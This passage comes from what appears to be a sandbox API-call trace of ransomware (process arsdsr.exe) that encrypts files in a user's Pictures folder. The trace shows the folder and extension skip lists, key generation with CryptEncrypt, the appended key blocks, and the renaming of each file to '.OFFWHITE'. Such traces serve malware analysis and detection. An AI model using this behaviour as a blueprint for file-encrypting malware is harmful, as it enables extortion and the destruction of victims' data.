HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\YJ5669616Mniq7E9dpnm.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\YJ5669616Mniq7E9dpnm.jpg" [0135.605] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.605] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.605] PathFindExtensionW (pszPath="YJ5669616Mniq7E9dpnm.jpg") returned=".jpg" [0135.605] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0135.605] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0135.605] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0135.605] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0135.605] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0135.605] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0135.605] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0135.605] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0135.605] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0135.605] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0135.605] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0135.605] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0135.605] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0135.605] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0135.605] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0135.605] lstrcmpiW (lpString1="YJ5669616Mniq7E9dpnm.jpg", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.605] GetProcessHeap () returned 0x500000 [0135.605] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531b10 [0135.605] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\YJ5669616Mniq7E9dpnm.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\wu4jnla\\yj5669616mniq7e9dpnm.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0135.605] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=52562) returned 1 [0135.605] GetProcessHeap () returned 0x500000 [0135.605] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.606] GetProcessHeap () returned 0x500000 [0135.606] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.606] GetProcessHeap () returned 0x500000 [0135.606] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.606] GetProcessHeap () returned 0x500000 [0135.606] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.606] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.606] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.606] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.606] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.606] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.606] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.606] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.606] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.606] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295c910*=0x100) returned 1 [0135.606] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.606] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.606] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295c90c*=0x100) returned 1 [0135.606] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xcd52, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.606] SetLastError (dwErrCode=0x0) [0135.606] WriteFile (in: hFile=0x1e4, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0135.608] GetLastError () returned 0x0 [0135.608] GetLastError () returned 0x0 [0135.608] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xce52, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.608] WriteFile (in: hFile=0x1e4, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0135.608] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xcf52, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.608] WriteFile (in: hFile=0x1e4, lpBuffer=0x531b10*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x531b10*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0135.608] GetProcessHeap () returned 0x500000 [0135.608] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xcd52) returned 0x55d7d0 [0135.608] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.608] ReadFile (in: hFile=0x1e4, lpBuffer=0x55d7d0, nNumberOfBytesToRead=0xcd52, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesRead=0x295cb40*=0xcd52, lpOverlapped=0x0) returned 1 [0135.611] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.611] WriteFile (in: hFile=0x1e4, lpBuffer=0x55d7d0*, nNumberOfBytesToWrite=0xcd52, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesWritten=0x295cb4c*=0xcd52, lpOverlapped=0x0) returned 1 [0135.612] GetProcessHeap () returned 0x500000 [0135.612] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55d7d0 | out: hHeap=0x500000) returned 1 [0135.612] CloseHandle (hObject=0x1e4) returned 1 [0135.617] GetProcessHeap () returned 0x500000 [0135.617] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.617] GetProcessHeap () returned 0x500000 [0135.617] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.617] GetProcessHeap () returned 0x500000 [0135.617] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.617] GetProcessHeap () returned 0x500000 [0135.617] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.617] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\YJ5669616Mniq7E9dpnm.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\YJ5669616Mniq7E9dpnm.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\YJ5669616Mniq7E9dpnm.jpg" [0135.617] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\YJ5669616Mniq7E9dpnm.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\YJ5669616Mniq7E9dpnm.jpg.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\YJ5669616Mniq7E9dpnm.jpg.OFFWHITE" [0135.617] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\YJ5669616Mniq7E9dpnm.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\wu4jnla\\yj5669616mniq7e9dpnm.jpg"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\YJ5669616Mniq7E9dpnm.jpg.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\wu4jnla\\yj5669616mniq7e9dpnm.jpg.offwhite")) returned 1 [0135.619] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9840c0, ftCreationTime.dwHighDateTime=0x1d5db04, ftLastAccessTime.dwLowDateTime=0xbf55aa0, ftLastAccessTime.dwHighDateTime=0x1d5e687, ftLastWriteTime.dwLowDateTime=0xbf55aa0, ftLastWriteTime.dwHighDateTime=0x1d5e687, nFileSizeHigh=0x0, nFileSizeLow=0xcd52, dwReserved0=0x295cb3c, dwReserved1=0x42d727a7, cFileName="YJ5669616Mniq7E9dpnm.jpg", cAlternateFileName="YJ5669~1.JPG")) returned 0 [0135.619] FindClose (in: hFindFile=0x544790 | out: hFindFile=0x544790) returned 1 [0135.619] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a57160, ftCreationTime.dwHighDateTime=0x1d5d9c0, ftLastAccessTime.dwLowDateTime=0xe6619e80, ftLastAccessTime.dwHighDateTime=0x1d5db0e, ftLastWriteTime.dwLowDateTime=0xe6619e80, ftLastWriteTime.dwHighDateTime=0x1d5db0e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d1bc, dwReserved1=0x3742a4d2, cFileName="wu4JnlA", cAlternateFileName="")) returned 0 [0135.619] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0135.620] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3ecc260, ftCreationTime.dwHighDateTime=0x1d5e6ff, ftLastAccessTime.dwLowDateTime=0x7fc5a7e0, ftLastAccessTime.dwHighDateTime=0x1d5e287, ftLastWriteTime.dwLowDateTime=0x7fc5a7e0, ftLastWriteTime.dwHighDateTime=0x1d5e287, nFileSizeHigh=0x0, nFileSizeLow=0x15280, dwReserved0=0x80007e, dwReserved1=0x295e370, cFileName="S4H-ht39OoZ.png", cAlternateFileName="S4H-HT~1.PNG")) returned 1 [0135.620] lstrcmpiW (lpString1="S4H-ht39OoZ.png", lpString2=".") returned 1 [0135.620] lstrcmpiW (lpString1="S4H-ht39OoZ.png", lpString2="..") returned 1 [0135.620] lstrcmpiW (lpString1="S4H-ht39OoZ.png", lpString2="...") returned 1 [0135.620] lstrcmpiW (lpString1="S4H-ht39OoZ.png", lpString2="windows") returned -1 [0135.620] lstrcmpiW (lpString1="S4H-ht39OoZ.png", lpString2="$recycle.bin") returned 1 [0135.620] lstrcmpiW (lpString1="S4H-ht39OoZ.png", lpString2="rsa") returned 1 [0135.620] lstrcmpiW (lpString1="S4H-ht39OoZ.png", lpString2="ntuser.dat") returned 1 [0135.620] lstrcmpiW (lpString1="S4H-ht39OoZ.png", lpString2="programdata") returned 1 [0135.620] lstrcmpiW (lpString1="S4H-ht39OoZ.png", lpString2="appdata") returned 1 [0135.620] lstrcmpiW (lpString1="S4H-ht39OoZ.png", lpString2="program files") returned 1 [0135.620] lstrcmpiW (lpString1="S4H-ht39OoZ.png", lpString2="program files (x86)") returned 1 [0135.620] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\" [0135.620] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\", lpString2="S4H-ht39OoZ.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\S4H-ht39OoZ.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\S4H-ht39OoZ.png" [0135.620] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.620] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.620] PathFindExtensionW (pszPath="S4H-ht39OoZ.png") returned=".png" [0135.620] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0135.620] lstrcmpiW (lpString1=".png", lpString2=".log") returned 1 [0135.620] lstrcmpiW (lpString1=".png", lpString2=".cab") returned 1 [0135.620] lstrcmpiW (lpString1=".png", lpString2=".cmd") returned 1 [0135.620] lstrcmpiW (lpString1=".png", lpString2=".com") returned 1 [0135.620] lstrcmpiW (lpString1=".png", lpString2=".cpl") returned 1 [0135.620] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0135.621] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0135.621] lstrcmpiW (lpString1=".png", lpString2=".url") returned -1 [0135.621] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0135.621] lstrcmpiW (lpString1=".png", lpString2=".mp3") returned 1 [0135.621] lstrcmpiW (lpString1=".png", lpString2=".pif") returned 1 [0135.621] lstrcmpiW (lpString1=".png", lpString2=".mp4") returned 1 [0135.621] lstrcmpiW (lpString1=".png", lpString2=".OFFWHITE") returned 1 [0135.621] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0135.621] lstrcmpiW (lpString1="S4H-ht39OoZ.png", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.621] GetProcessHeap () returned 0x500000 [0135.621] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531b20 [0135.621] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\S4H-ht39OoZ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\s4h-ht39ooz.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0135.621] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=86656) returned 1 [0135.621] GetProcessHeap () returned 0x500000 [0135.621] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.621] GetProcessHeap () returned 0x500000 [0135.621] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.621] GetProcessHeap () returned 0x500000 [0135.622] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.622] GetProcessHeap () returned 0x500000 [0135.622] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.622] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.622] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.622] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.622] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.622] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.622] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.622] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.622] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.622] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295d610*=0x100) returned 1 [0135.622] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.622] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.622] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295d60c*=0x100) returned 1 [0135.623] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x15280, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.623] SetLastError (dwErrCode=0x0) [0135.623] WriteFile (in: hFile=0x214, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0135.625] GetLastError () returned 0x0 [0135.625] GetLastError () returned 0x0 [0135.625] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x15380, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.625] WriteFile (in: hFile=0x214, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0135.625] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x15480, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.625] WriteFile (in: hFile=0x214, lpBuffer=0x531b20*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x531b20*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0135.625] GetProcessHeap () returned 0x500000 [0135.625] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x15280) returned 0x55b7c0 [0135.625] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.625] ReadFile (in: hFile=0x214, lpBuffer=0x55b7c0, nNumberOfBytesToRead=0x15280, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesRead=0x295d840*=0x15280, lpOverlapped=0x0) returned 1 [0135.631] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.631] WriteFile (in: hFile=0x214, lpBuffer=0x55b7c0*, nNumberOfBytesToWrite=0x15280, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesWritten=0x295d84c*=0x15280, lpOverlapped=0x0) returned 1 [0135.632] GetProcessHeap () returned 0x500000 [0135.632] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55b7c0 | out: hHeap=0x500000) returned 1 [0135.632] CloseHandle (hObject=0x214) returned 1 [0135.637] GetProcessHeap () returned 0x500000 [0135.637] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.637] GetProcessHeap () returned 0x500000 [0135.637] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.637] GetProcessHeap () returned 0x500000 [0135.637] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.637] GetProcessHeap () returned 0x500000 [0135.637] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.637] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\S4H-ht39OoZ.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\S4H-ht39OoZ.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\S4H-ht39OoZ.png" [0135.637] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\S4H-ht39OoZ.png", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\S4H-ht39OoZ.png.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\S4H-ht39OoZ.png.OFFWHITE" [0135.637] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\S4H-ht39OoZ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\s4h-ht39ooz.png"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\S4H-ht39OoZ.png.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\s4h-ht39ooz.png.offwhite")) returned 1 [0135.638] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1282040, ftCreationTime.dwHighDateTime=0x1d5dbb8, ftLastAccessTime.dwLowDateTime=0xa6b0eb80, ftLastAccessTime.dwHighDateTime=0x1d5de9a, ftLastWriteTime.dwLowDateTime=0xa6b0eb80, ftLastWriteTime.dwHighDateTime=0x1d5de9a, nFileSizeHigh=0x0, nFileSizeLow=0xa734, dwReserved0=0x80007e, dwReserved1=0x295e370, cFileName="SSMFTzSnPYwJ.gif", cAlternateFileName="SSMFTZ~1.GIF")) returned 1 [0135.638] lstrcmpiW (lpString1="SSMFTzSnPYwJ.gif", lpString2=".") returned 1 [0135.638] lstrcmpiW (lpString1="SSMFTzSnPYwJ.gif", lpString2="..") returned 1 [0135.638] lstrcmpiW (lpString1="SSMFTzSnPYwJ.gif", lpString2="...") returned 1 [0135.638] lstrcmpiW (lpString1="SSMFTzSnPYwJ.gif", lpString2="windows") returned -1 [0135.638] lstrcmpiW (lpString1="SSMFTzSnPYwJ.gif", lpString2="$recycle.bin") returned 1 [0135.638] lstrcmpiW (lpString1="SSMFTzSnPYwJ.gif", lpString2="rsa") returned 1 [0135.638] lstrcmpiW (lpString1="SSMFTzSnPYwJ.gif", lpString2="ntuser.dat") returned 1 [0135.638] lstrcmpiW (lpString1="SSMFTzSnPYwJ.gif", lpString2="programdata") returned 1 [0135.638] lstrcmpiW (lpString1="SSMFTzSnPYwJ.gif", lpString2="appdata") returned 1 [0135.638] lstrcmpiW (lpString1="SSMFTzSnPYwJ.gif", lpString2="program files") returned 1 [0135.638] lstrcmpiW (lpString1="SSMFTzSnPYwJ.gif", lpString2="program files (x86)") returned 1 [0135.638] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\" [0135.639] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\", lpString2="SSMFTzSnPYwJ.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\SSMFTzSnPYwJ.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\SSMFTzSnPYwJ.gif" [0135.639] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.639] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.639] PathFindExtensionW (pszPath="SSMFTzSnPYwJ.gif") returned=".gif" [0135.639] lstrcmpiW (lpString1=".gif", lpString2=".exe") returned 1 [0135.639] lstrcmpiW (lpString1=".gif", lpString2=".log") returned -1 [0135.639] lstrcmpiW (lpString1=".gif", lpString2=".cab") returned 1 [0135.639] lstrcmpiW (lpString1=".gif", lpString2=".cmd") returned 1 [0135.639] lstrcmpiW (lpString1=".gif", lpString2=".com") returned 1 [0135.639] lstrcmpiW (lpString1=".gif", lpString2=".cpl") returned 1 [0135.639] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0135.639] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0135.639] lstrcmpiW (lpString1=".gif", lpString2=".url") returned -1 [0135.639] lstrcmpiW (lpString1=".gif", lpString2=".ttf") returned -1 [0135.639] lstrcmpiW (lpString1=".gif", lpString2=".mp3") returned -1 [0135.639] lstrcmpiW (lpString1=".gif", lpString2=".pif") returned -1 [0135.639] lstrcmpiW (lpString1=".gif", lpString2=".mp4") returned -1 [0135.639] lstrcmpiW (lpString1=".gif", lpString2=".OFFWHITE") returned -1 [0135.639] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0135.639] lstrcmpiW (lpString1="SSMFTzSnPYwJ.gif", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.639] GetProcessHeap () returned 0x500000 [0135.639] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x521ee0 [0135.639] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS 